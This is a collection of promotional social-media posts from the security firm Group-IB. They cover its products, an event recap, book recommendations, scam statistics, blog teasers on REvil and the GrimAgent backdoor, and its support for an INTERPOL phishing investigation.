#cybersecurity #digitalrisks
The Digital Risk Protection platform 👇

🔹Identifies illegitimate use of digital assets
🔹Classifies and scores the detected violations
🔹Prioritizes and initiates appropriate takedown tactics

The solution uses advanced technologies to detect any illegitimate use of your logos, trademarks, content, and design layouts across the digital surface.

Curious to know more? Head over to our website 😉

#GISEC2021 #MEA
GISEC 2021 was a blast!

👨‍💻 Thank you so much to everyone who visited our stand, talked to our team, watched us on stage or simply followed our live updates on social media.

🌍 Group-IB made a noticeable contribution to this year’s edition of the largest cybersecurity showcase in the region, and with the new Dubai HQ now up and running, we feel strong to bring our presence and services in the Middle East on to the next level!

We hope you like our video recap and see you again soon!

#books #cybersecurity
One of the most popular questions we’re getting has to be about books

💡 Many of our followers are keen to get into digital forensics, incident response, or malware analysis, but not sure on the best guide to get started. Others, while already being professionals, are eager to take their skills on to the next level.

📚 So do we have the right recommendation for everyone passionate about cybersecurity?

Most definitely! In fact, a while ago we posted a blog going through 11 books useful for both beginners and high level professionals.

We have also added a detailed description for each one of our recommendations, so make sure to have a look ☝️

Of course this is by no means a complete list, however it’s a great start for everyone striving to expand his knowledge and skills ✨

Don’t have enough time to go through the blog? No worries - we’ve listed all 11 books below:

1. File System Forensic Analysis by Brian Carrier
2. Incident Response & Computer Forensics, Third Edition by Jason T. Luttgens, Matthew Pepe, Kevin Mandia
3. Investigating Windows Systems by Harlan Carvey
4. Digital Forensics and Incident Response, Second Edition by Gerard Johansen
5. Windows Forensics Cookbook by Oleg Skulkin and Scar de Courcier
6. The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory by Michael Hale Ligh
7. Network Forensics by Ric Messier
8. Practical Mobile Forensics: Forensically investigate and analyze iOS, Android, and Windows 10 devices, Fourth Edition by Rohit Tamma, Oleg Skulkin, Heather Mahalik, Satish Bommisetty
9. Learning Android Forensics: Analyze Android devices with the latest forensic tools and techniques, Second Edition by Oleg Skulkin, Donnie Tindall, Rohit Tamma
10. Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware by Monnappa K. A.
11. Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats
by Alex Matrosov, Eugene Rodionov, Sergey Bratus

Enjoy reading 🙂

#digitalriskprotection #scams
Scam cases are on the rise

🕵️‍♀️ According to the Singapore Police Force's Annual Crime Brief 2020, there were 14,236 cases last year, including Internet love scams, impersonation scams and loan scams, with losses totalling of $201.2 million. In 2019, there were 8,397 cases, with total losses at $121.8 million.

👨‍💻Mr Ilia Rozhnov, head of cyber-security company Group-IB's Digital Risk Protection department in the Asia-Pacific, explained that the Covid-19 pandemic has been a catalyst for the spike in the number of scams.

💬"There is the phenomenon of Scamdemic - an influx of online scams as more around the world dived online last year, when people were forced to go digital and make payments online, and use e-services," he said.

"According to Group-IB's data, last year, scams dominated the online cyber-criminal scene, totalling over 70 per cent of all online crimes."

➡️ Click here to read the full story.

#blog #ransomware
REvil Twins: Deep Dive into Prolific RaaS Affiliates' TTPs

🔹Ransomware continues to dominate the cybercriminal scene in 2021. The number of attacks as well as the ransom demands seem to be growing quickly. According to the Ransomware Uncovered 2020-2021 report, Ransomware-as-a-Service model, which involves the developers selling/leasing malware to the program affiliates for further network compromise and ransomware deployment, became one of the major driving forces behind phenomenal growth of the ransomware market.

🔹Group-IB DFIR team observed that 64% of all ransomware attacks it analyzed in 2020 came from operators using the RaaS model.

🔹In our new blog post by Oleg Skulkin, Senior Digital Forensics analyst at Group-IB, we focus on one of the most active ransomware collectives, REvil, and their RaaS program, which attracts more and more affiliates due to the shutdown of other RaaS.

🔹Our experts took a deep dive into the modus operandi of REvil affiliates and shared some information on various affiliates' tactics, techniques and procedures observed, so defenders can tune their detection capabilities accordingly.

🔹Make sure to save the detection tips and REvil affiliates’ TTPs mapped in accordance with MITRE ATT&CK by Group-IB DFIR team.

➡️ Click here to read the blog now.

#ransomware #groupib #reverseengineering #Ryuk #GrimAgent
Group-IB Threat Intelligence team reverse engineered the Grim Agent backdoor used in Ryuk ransomware operations for the very first time

Our latest blog comes with all the details, including Yara and Suricata rules.

Ransomware activity increased drastically over the past couple of years and became the face of cybercrime by 2021.

📄 According to the Ransomware Uncovered 2020-2021 report, the number of ransomware attacks increased by more than 150% in 2020. The attacks grew in not only number but also scale and sophistication — the average ransom demand increased by more than twofold and amounted to $170,000 in 2020.

👥 Gangs are constantly evolving. The past year saw ransomware operators change their tactics, defense evasion techniques, and procedures to ensure that their illicit business thrives. Given that ransomware attacks are conducted by humans, understanding the modus operandi and toolset used by attackers is essential for companies that want to avoid costly downtimes. Ultimately, knowing how ransomware gangs operate and being able to thwart their attacks is more cost-effective than paying ransoms.

🔹 One of the underlying trends of 2021 to keep in mind is the use of commodity malware. The infamous ransomware gang Ryuk, which is responsible for many high-profile cyber heists followed suit. The most recent addition to their arsenal, which is yet to be explored, is the malware called GrimAgent.

💡Our new blog features the first comprehensive analysis of the GrimAgent backdoor. It is intended mainly for reverse engineers, researchers and blue teams so that they can create and implement rules that help monitor this cyber threat closely.

💪The blog also provides a great illustration of our team in action.

➡️ Click here to check it out.

#mssp #gib_thf
Group-IB has signed a partnership agreement with CyberSec Services, a Managed Security Services Provider with offices in Milan and Ticino 🇮🇹🇨🇭

🤝 CyberSec Services becomes the first partner in Europe who joined Group-IB’s MSSP & MDR program.

⏫ Thanks to the partnership Italian and Swiss companies can now take advantage of Group-IB’s Threat Hunting Framework - first ever single multi-tenant solution to identify and attribute cyber criminals, detect, hunt, and respond to most sophisticated threats in both IT and OT networks.

💬 Alessandro Aresi, CEO of CyberSec Services, comments: “We have identified Group-IB as the ideal partner for a service offering which covers the most different needs of our customers. The peculiarity of Group-IB is the completeness of their solutions and the ability to make their portfolio compatible and complementary to an MSSP such as CyberSec Services.

One of the most interesting aspects for us, besides the consolidated experience in the field of Cyber Threat Intelligence and Investigation, is the ability to let converge the more traditional world of IT with the world of OT. This aspect allowed us for example to serve at best one of our most relevant customers, who wanted to source out full protection of their power plants and of the entire IT infrastructure from one single hand, with considerable savings in time and costs”.

#interpol #phishing #fraud #carding
Group-IB has supported INTERPOL in its Lyrebird operation that resulted in the identification and apprehension of a threat actor presumably responsible for multiple attacks worldwide.

👥 According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.

⚔️ The alleged perpetrator, who turned out to be a citizen of Morocco, was arrested in May by the Moroccan police based on the data about his cybercrimes that was provided by Group-IB.

🧑‍💻 The starting point of Group-IB’s research to identify and deanonymize the cybercriminal was the extraction of a phishing kit (a tool used to create phishing web pages) exploiting the brand of a large French bank by Group-IB’s Threat Intelligence & Attribution system.

🔁 The set-up of the detected phishing kit followed a common technique, with the creation of a spoofed website of a targeted company, the mass distribution of emails impersonating it and asking users to enter login information on the spoofed site. The credentials left by unsuspecting victims on the fake page were then redirected to the perpetrator’s email. Almost each of the scripts contained in the phishing kit had its creator’s nickname, Dr HeX, and contact email address.

➡️ Curious to learn the details? Click here to read the full story!

#gib_thf #marketplace
Group-IB joins Palo Alto Networks Cortex XSOAR Marketplace

⭐️ Our Threat Hunting Framework Polygon, a Malware Detonation & Research platform, is now available on the Palo Alto Networks Cortex XSOAR Marketplace, the industry’s largest and most comprehensive security orchestration marketplace. The content pack from Group-IB on Cortex XSOAR’s Marketplace provides customers with a tool that guarantees malware detonation and behavioral analysis, and was developed by engineers with long-standing experience in investigating cybercrimes worldwide, and participating in global operations with international law enforcement, incident response, and cyberattack monitoring and attribution.

🔁 Group-IB’s THF Polygon is an integral part of the company’s ecosystem of high-powered and innovative solutions for protection against previously unknown threats and targeted attacks along with investigating and responding to cybercrimes to minimize potential consequences. Be sure to have a look at the comprehensive overview to learn more.

💬 “A robust, open ecosystem is at the heart of Cortex XSOAR,” said Rishi Bhargava, VP of Product Strategy for Cortex XSOAR at Palo Alto Networks. “We are proud to welcome Group-IB to the Cortex XSOAR Marketplace ecosystem, which has 700+ integrations that enable our customers to connect disparate security tools and data sources to enable maximum efficiency in the SOC.”